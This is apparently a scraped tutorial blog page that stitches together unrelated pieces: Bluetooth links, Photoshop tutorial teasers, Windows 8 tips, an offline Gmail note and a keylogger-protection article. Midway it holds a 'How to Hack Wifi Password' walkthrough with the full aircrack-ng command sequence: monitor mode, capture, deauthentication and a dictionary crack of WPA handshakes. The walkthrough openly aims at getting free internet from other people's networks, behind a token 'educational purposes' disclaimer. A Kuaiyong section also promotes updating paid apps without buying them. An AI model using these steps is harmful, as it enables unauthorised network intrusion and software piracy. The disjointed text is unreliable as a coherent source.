For a general introduction to Bluetooth technology, see http://www.dell.com/downloads/global/vectors/2003_bluetooth.pdf. An interesting paper on Bluetooth security is available at http://www.niksula.cs.hut.fi/~jiitv/bluesec.html.

http://www.holtmann.org/ has plenty of information regarding Bluetooth and Linux; I found the document `Bluetooth Programming for Linux' (http://www.holtmann.org/papers/bluetooth/wtc2003_slides.pdf) very informative.

Lots of information about Python on Series 60 mobiles is available at http://www.postneo.com/postwiki/moin.cgi/PythonForSeries60/. ObexFTP seems to be an interesting tool - you can get it from http://triq.net/obex/. There are some documents floating around on the net which describe how you can do an NFS mount of your phone's file system - try a Google search.


Warning: This is Only For Educational Purposes, I Am Not Responsible Of What You Do With It.

Create a Cute Little Deer in Photoshop

In this Photoshop Tutorial we are going to make a Cute Little Deer. We will be using some basic tools such as the pen, dodge, and burn tools in the process of making this tutorial. Hopefully you will like it!

How to Create a Mountainous Matte Painting in Photoshop

Matte Painting

How to Create a Mountainous Matte Painting in Photoshop

Learn how to create this landscape matte painting with Photoshop! This tutorial will show you how to create your own mountain scene by arranging multiple stock images together and blending them correctly using layer masks and adjustment layers. You will also learn effective techniques for adding waterfalls and mist.

Update Apps Installed through Kuaiyong


So you have installed apps from Kuaiyong, but you are annoyed with the number of updates it keeps showing, increasing day by day, and you can't update your apps. Well, you can update them easily by following this step-by-step tutorial, through which you will learn how to update your application without actually purchasing the app. Kuaiyong is an app through which you can install applications for free without any problems; you do not require a jailbreak or anything, all you need is an iDevice and Kuaiyong, and you can install apps on your iDevice for FREE.


Create a Christmas Artwork in Photoshop

In this photo-manipulation tutorial, we will learn how to create a huge Christmas tree sitting alone in a winter field. This tutorial will show you how to create this beautiful image using stock images and textures and apply special lighting effects to make the Christmas tree glow.

How to Hack Wifi Password - EASY

This is one of the fresh tutorials on Wi-Fi hacking. Many of us know there are many such wireless networks present around us, so I decided: why not hack those networks so we can get some free internet access?

So let's begin. For this you need the BackTrack OS and a network adapter (of course, one is always integrated with your laptop).
Let's do this :)

  • Setting up your network device on your laptop
To capture network traffic without being associated with an access point, we need to set the wireless network card in monitor mode.
To do that, type
Command # iwconfig (to find all wireless network interfaces and their status.)

Command # airmon-ng start wlan0 (to set in monitor mode, you may have to substitute wlan0 for your own interface name)

  • Reconnaissance
This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. Next step is finding available wireless networks, and choosing your target:
Command # airodump-ng mon0 (Monitors all channels, listing available access points and associated clients within range.)
  • Capturing Packets
To capture data into a file, we need to use the airodump-ng tool again, along with some additional switches to target a specific AP and channel. Assuming our wireless card is mon0, and we want to capture packets on channel 1 into a file called data:
Command # airodump-ng -c 1 bssid AP_MAC -w data mon0
  • De-Authentication Technique
To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:

Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_AP is the MAC address of the access point, MAC_CLIENT is the MAC address of an associated client.)

  • Cracking WPA/WPA2
Once you have captured a four-way handshake, you also need a large/relevant dictionary file (commonly known as a wordlist) with common pass phrases.

Command # aircrack-ng -w wordlist 'capture_file'.cap (where wordlist is your dictionary file, and capture_file is a .cap file with a valid WPA handshake)

Cracking WPA-PSK and WPA2-PSK only needs a handshake. After that, an offline dictionary attack on that handshake takes much longer, and will only succeed with weak pass phrases and good dictionary files.

Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a weak/short/common/human-readable pass phrase can be broken within a few minutes using an offline dictionary attack.

This one is real, tested and working perfectly, so all the best, hackers.

This post is only for educational purposes; I am not responsible for the things you do...

How to Downgrade Windows 8 Preinstalled to Windows 7

This tutorial will show you how to downgrade your preinstalled Windows 8, with or without Secure Boot, to Windows 7.

Create a Mobile Calendar App in Photoshop

Tutorial Details
Program: Adobe Photoshop CS5
Difficulty: Intermediate
Estimated Completion Time: 2-3 Hours

In this tutorial we will show you how to design a Mobile Calendar App in Photoshop

How To Confirm Secure Boot Enabled or Disabled in Windows 8

This tutorial will show you how to confirm whether Secure Boot is enabled or disabled in your UEFI settings from inside Windows 8.
You must be signed in as an administrator to be able to do the steps in this tutorial.

How to Open an Elevated Windows PowerShell in Windows 8

Windows PowerShell is a task-based command-line shell and scripting language designed especially for system administration.

For more information and usage about Windows PowerShell, see: Windows PowerShell

The tutorial will show you how to open an elevated "Windows PowerShell" that will run as administrator with full administrator rights in Windows 8.

Use The Offline Gmail

Gmail, as we all know, is short for Google Mail; it is one of the products of Google Inc. In the race of email clients Gmail is rushing its way to the top with more and more abilities, and is thus attracting more users from other mail providers such as Yahoo and Outlook (formerly known as Hotmail). They have introduced many extra features through Labs features, which are right now in the testing stage but which users can still use. You can view and enable them from the tab which appears in the right-most corner of Gmail.

How to be safe from keyloggers and What to do in such Situations?

In this tutorial I am going to talk about the most used piece of software, besides RATs, employed by hackers to observe your activities on your computer, and that is keyloggers. A keylogger is a software or hardware device which monitors each and every key typed by you on your keyboard. I am going to talk about the different types of keyloggers and how to be safe from them. So let's learn something about keyloggers.
1. What is keylogger ?

You might have heard about keyloggers but don't really know what they are; by reading this article you will be clear in your mind about what a keylogger does. A keylogger, also known as a keystroke logger, is a type of software through which each and every key typed by you on your keyboard is monitored. You will always fail to identify the presence of a keylogger on your computer, since it always runs in the background and is never listed in Task Manager or Control Panel. It is usually used by parents to keep an eye on their children, or by company owners to spy on their employees.

2. How it can harm you?

Well, it can harm you in different ways. Let's say it can be used by an enemy or friend to get your sensitive information, like your username and password on some website, bank or credit card details, or any other activity you do on your computer.

To be very clear, let's say you log in to your Yahoo account from a computer on which a keylogger is installed: then your username and password will be captured and used by the person who captured them, and thus misused.

3. Types Of Keyloggers

There are two types of keyloggers:
  1. Hardware keylogger
  2. Software keylogger
A software keylogger is installed on your computer, whereas a hardware keylogger is attached to the keyboard. Looking at the image below will clear your mind.
4. How to Protect yourself from keyloggers?

A keylogger can be used by your enemy to get sensitive information such as your bank or credit card details, or your password to any social networking site or any other site. In order to be safe, keep the following points in mind.

  1. Never use your online banking from a cyber cafe. If you have to, then you can try this method: open Notepad and type anything, then copy and paste each and every word that comes in your username or password.
  2. You can also use the above method to protect your Facebook profile, Yahoo or Gmail ID.
  3. When you enter a cyber cafe, make sure that no hardware device is attached to the keyboard wire. It looks quite similar to the above image.

Create a Painting Of Fantasy Warrior

Who does not like fantasy, and girls, especially fantasy girls? Not many people know how to draw them and face some terrible troubles. Well, follow this tutorial and hopefully you'll learn a lot about painting your own fantasy character!